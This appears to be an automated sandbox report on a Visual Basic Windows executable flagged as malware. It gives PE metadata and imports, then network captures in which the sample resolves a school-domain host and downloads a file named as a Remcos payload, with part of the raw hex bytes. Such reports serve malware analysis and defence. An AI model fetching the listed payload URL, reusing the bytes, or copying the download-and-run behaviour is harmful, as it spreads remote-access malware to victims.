IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x133bc	0x14000	False	0.338391113281	data	5.72023929374	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x2560	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0x30a4	0x4000	False	0.107666015625	data	3.2477817313	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x193fc	0x1ca8	data
RT_ICON	0x18754	0xca8	data
RT_ICON	0x183ec	0x368	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x183bc	0x30	data
RT_VERSION	0x18150	0x26c	data	Hungarian	Hungary

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaLateMemSt, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x040e 0x04b0
InternalName	COLLUMELLIACEOUSFR
FileVersion	1.00
CompanyName	ColdStone
Comments	ColdStone
ProductName	ColdStone
ProductVersion	1.00
OriginalFilename	COLLUMELLIACEOUSFR.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Hungarian	Hungary

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 11:54:17.463218927 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:17.704843044 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.705131054 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:17.706018925 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:17.948926926 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.948966026 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.948980093 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.948992968 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.949004889 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.949018002 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.949033976 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.949049950 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.949065924 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.949081898 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.949105978 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:17.949229956 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:17.949330091 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.194422007 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.194454908 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.194499016 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.194519043 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.194614887 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.194669962 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.195597887 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195626020 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195647001 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195671082 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195676088 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.195691109 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.195696115 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195718050 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195734024 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.195741892 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195765018 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195780993 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.195787907 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195812941 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195818901 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.195837021 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195848942 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.195863962 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195890903 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195894957 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.195913076 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195930958 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.195936918 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195960999 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.195982933 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.196022987 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.435492992 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.435529947 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.435549974 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.435776949 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.435780048 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.435807943 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.435832024 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.435844898 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.435853004 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.435878992 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.435885906 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.435931921 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437078953 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437158108 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437167883 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437184095 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437207937 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437208891 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437232018 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437235117 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437257051 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437257051 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437283039 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437305927 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437361002 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437396049 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437414885 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437422037 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437447071 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437448025 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437469006 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437474012 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437491894 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437495947 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437513113 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437522888 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437536001 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437570095 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437604904 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437608004 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437629938 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437660933 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437664032 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437690020 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437694073 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437719107 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437743902 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437886000 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437908888 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437931061 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437942028 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.437952042 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437978983 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.437978983 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.438002110 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.438024044 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.438024044 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.438046932 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.438066959 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.438067913 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.438088894 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.438101053 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.438108921 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.438131094 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.438138962 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.438179016 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.438249111 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.438296080 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.438364983 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.438411951 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.677576065 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.677613020 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.677637100 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.677659988 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.677685022 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.677825928 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.677879095 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.677944899 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.677968979 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.677992105 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678016901 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678041935 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678052902 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678066969 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678088903 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678100109 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678112030 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678123951 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678138018 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678158998 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678191900 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678214073 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678236008 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678270102 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678292990 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678493023 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678523064 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678546906 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678553104 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678565979 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678569078 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678594112 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678594112 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678617001 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678622007 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678634882 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678646088 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678658009 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678668976 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678680897 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678692102 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678716898 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678716898 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678730965 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678741932 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678762913 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678765059 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678793907 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678816080 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:18.678903103 CET	80	49754	103.150.60.242	192.168.2.6
Feb 23, 2021 11:54:18.678960085 CET	49754	80	192.168.2.6	103.150.60.242
Feb 23, 2021 11:54:22.081600904 CET	49754	80	192.168.2.6	103.150.60.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 11:50:20.494863033 CET	64267	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:20.553150892 CET	53	64267	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:20.665954113 CET	49448	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:20.717654943 CET	53	49448	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:22.611630917 CET	60342	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:22.664818048 CET	53	60342	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:23.752387047 CET	61346	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:23.801295042 CET	53	61346	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:25.206598997 CET	51774	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:25.255214930 CET	53	51774	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:26.356784105 CET	56023	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:26.405522108 CET	53	56023	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:47.749281883 CET	58384	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:47.802433014 CET	53	58384	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:49.065958977 CET	60261	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:49.117599010 CET	53	60261	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:50.449726105 CET	56061	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:50.498434067 CET	53	56061	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:51.436479092 CET	58336	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:51.498264074 CET	53	58336	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:55.571991920 CET	53781	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:55.621051073 CET	53	53781	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:58.362514973 CET	54064	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:58.411736012 CET	53	54064	8.8.8.8	192.168.2.6
Feb 23, 2021 11:50:59.567500114 CET	52811	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:50:59.616815090 CET	53	52811	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:00.687546968 CET	55299	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:00.740309000 CET	53	55299	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:04.048954010 CET	63745	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:04.099860907 CET	53	63745	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:05.391443968 CET	50055	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:05.443031073 CET	53	50055	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:09.158325911 CET	61374	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:09.219770908 CET	53	61374	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:10.251880884 CET	50339	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:10.303505898 CET	53	50339	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:11.731232882 CET	63307	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:11.780613899 CET	53	63307	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:16.328846931 CET	49694	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:16.380301952 CET	53	49694	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:22.589905024 CET	54982	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:22.646641016 CET	53	54982	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:23.502558947 CET	50010	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:23.561414957 CET	53	50010	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:24.597790003 CET	63718	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:24.655122995 CET	53	63718	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:25.062428951 CET	62116	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:25.112900972 CET	53	62116	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:25.580322027 CET	63816	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:25.637217045 CET	53	63816	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:26.145210981 CET	55014	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:26.194143057 CET	53	55014	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:26.768337011 CET	62208	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:26.819892883 CET	53	62208	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:26.949472904 CET	57574	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:27.009488106 CET	53	57574	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:27.723774910 CET	51818	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:27.781016111 CET	53	51818	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:28.796834946 CET	56628	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:28.848501921 CET	53	56628	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:29.329248905 CET	60778	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:29.386674881 CET	53	60778	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:34.320015907 CET	53799	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:34.378639936 CET	53	53799	8.8.8.8	192.168.2.6
Feb 23, 2021 11:51:59.111588001 CET	54683	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:51:59.173008919 CET	53	54683	8.8.8.8	192.168.2.6
Feb 23, 2021 11:52:02.304603100 CET	59329	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:52:02.353513002 CET	53	59329	8.8.8.8	192.168.2.6
Feb 23, 2021 11:52:05.716749907 CET	64021	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:52:05.773998022 CET	53	64021	8.8.8.8	192.168.2.6
Feb 23, 2021 11:54:16.919399977 CET	56129	53	192.168.2.6	8.8.8.8
Feb 23, 2021 11:54:17.435394049 CET	53	56129	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 11:54:16.919399977 CET	192.168.2.6	8.8.8.8	0x1496	Standard query (0)	mtspsmjeli.sch.id	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 11:54:17.435394049 CET	8.8.8.8	192.168.2.6	0x1496	No error (0)	mtspsmjeli.sch.id		103.150.60.242	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

mtspsmjeli.sch.id

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49754	103.150.60.242	80	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 11:54:17.706018925 CET	5165	OUT	GET /cl/Jice_remcos%202_tfkxJbdn252.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mtspsmjeli.sch.id Cache-Control: no-cache
Feb 23, 2021 11:54:17.948966026 CET	5166	IN	HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: application/octet-stream Last-Modified: Sun, 21 Feb 2021 23:09:31 GMT Accept-Ranges: bytes Content-Length: 131136 Date: Tue, 23 Feb 2021 10:54:17 GMT Server: LiteSpeed Data Raw: 3a ad 04 c3 ea 0e 50 7a 97 61 2c f0 5c fe 44 4c 29 0c ae ca 1f ad ad 18 dc a1 0a 32 e6 20 82 c5 f9 35 68 d2 3b 10 99 54 54 f6 d5 e7 14 82 c8 66 c9 cd de 83 04 6a 38 10 1a 4d 6b f0 5d ed e3 59 4f ed 8c 3c 73 44 5b 6d 0f 3a 7a be 58 fc 74 1e 48 b1 b4 80 28 38 e4 8d af 5a bf b1 08 6f d1 88 82 f4 c3 aa f3 56 76 40 e8 d9 04 c5 f5 aa 54 d1 0e 58 45 fe 0a 36 78 b5 18 ee 22 d0 16 b1 da e0 9b 84 e6 f2 17 3f ef 4f 53 a4 36 2a a2 b3 5c 18 da b2 47 c9 9a 4f f0 dc e2 9d 29 ef 3a 98 b1 0d 24 e3 2d 04 2b 9c a9 b8 ea 93 88 3f 87 97 a7 77 47 c1 bd 90 f3 90 68 3c 73 2f 6f 4a 8e 03 3a d6 32 51 c8 19 ec 00 7d 87 04 e3 6e 8c 08 9b d7 cf 40 b8 8b c1 9f c8 a8 4d ca 0a 06 3a ef a6 df e9 95 df cb 76 9e 8c 8a 82 38 f2 ab 21 7b 14 67 65 bd de d1 bb f9 ac cc 37 41 84 96 0f 1b 1d 87 ac 85 df df 25 d6 2b cd 28 34 c8 c2 46 14 26 f0 c3 46 05 f3 1a 66 97 b8 12 c4 d7 17 f0 7b 45 97 89 d5 c5 05 b6 0d 06 eb 8b c4 b7 29 d2 7e af b0 af c2 84 dd 42 44 9b cf f2 4a f7 05 d3 e7 19 86 00 e9 3b 52 3f 4c ec 06 82 53 15 c0 c4 6a b2 1a 0e b0 31 04 e2 af c1 45 6b dd d0 4f b9 b8 50 d7 44 1b 14 40 2c 2b b0 37 c9 ac c8 19 b5 ac fa 94 f9 4b a4 16 40 15 40 90 e0 26 9f 02 33 5f 49 39 03 95 01 d7 fe 0e 38 ec cf b3 16 f2 33 ad d5 3d ba 47 31 de 3b 7c bf 3a ce e8 b7 46 9b d7 85 36 ca fa aa ea 9d f9 5a f6 85 90 b8 84 ac f3 af 0b 35 d7 de 06 6d 23 2c 8e 96 2b 1c 58 b5 75 20 2c a1 4b f8 95 31 19 15 f3 ab 3b 78 24 7e 43 a0 96 27 8d 66 68 6f d5 64 b1 b9 99 db 81 5c 97 c5 13 86 6a 53 e1 53 af aa eb 45 a1 5c dd 1a ba 02 86 cb 16 b6 eb 47 ae 4d a4 e1 2f fa 35 0c 23 dd de 05 32 58 77 3a 47 b4 1a a1 bd bb 83 eb c0 f3 f0 ad b4 71 7d 1e 90 5f a8 82 c6 74 33 5e b1 68 d8 35 d7 09 8a 42 45 86 38 59 d5 fb 8b 8e 7a fc a7 b9 d8 b0 ca 48 06 6e 13 a1 4a 7a 7b 46 41 a2 fa 7d 85 9a 41 b6 98 66 90 0d 5a b8 d2 37 ba 9a 3d 92 8a 6f ee d9 d4 8e 52 12 e1 bc 37 2c 27 74 1f 03 5e 3e 9c 8e e9 ae 49 0c b6 be 17 7d 2d 43 6a de bd 54 9f ec 52 25 5e 63 76 a5 fc f9 1a 55 cf 84 44 a1 cc 61 7b 61 88 e5 7a 78 9c 2d 0a 0a bc 29 e6 f1 63 12 d8 03 60 68 25 ea da 06 ac bc 18 d5 c6 85 66 f9 0e ff e8 2b 4d 57 56 68 9b 43 a8 46 44 d3 50 e8 13 c6 c2 21 88 d8 c7 fe 0b 6a be ed 6e 4f 67 5a 61 27 91 f7 41 39 88 6d 63 b3 9c a0 4f 9b bf f5 19 45 d0 98 a2 9f fc 8e 62 8e 11 7d 7d e0 dc ba 63 a2 5e e8 d5 f7 be e8 8e e4 1d 73 d4 fc a1 27 f8 b1 2b 93 56 86 9c b0 28 fb 96 4c f9 6d 02 74 e1 04 2c 9a 3c 06 e2 49 2f 99 51 4c 31 40 e5 a8 7e cb cb 88 c2 a3 5d bb c9 1b 93 f4 7d a9 2f 70 22 5e 3a 50 b2 ad fb 07 63 2d 9c ac fe 58 85 2c 4a 12 4b 98 4c 77 00 44 45 7f 67 95 7e 77 86 98 20 20 3a 35 6b 54 12 5e bd fd c3 e1 08 3f 0b 35 a4 55 fd bd a4 c1 a7 58 7c 4f 6d d6 1b 67 87 49 e1 7f da 98 ce ab 97 a0 4b 91 91 30 34 30 f3 92 50 6c d6 36 8f 67 d9 74 46 a7 f5 04 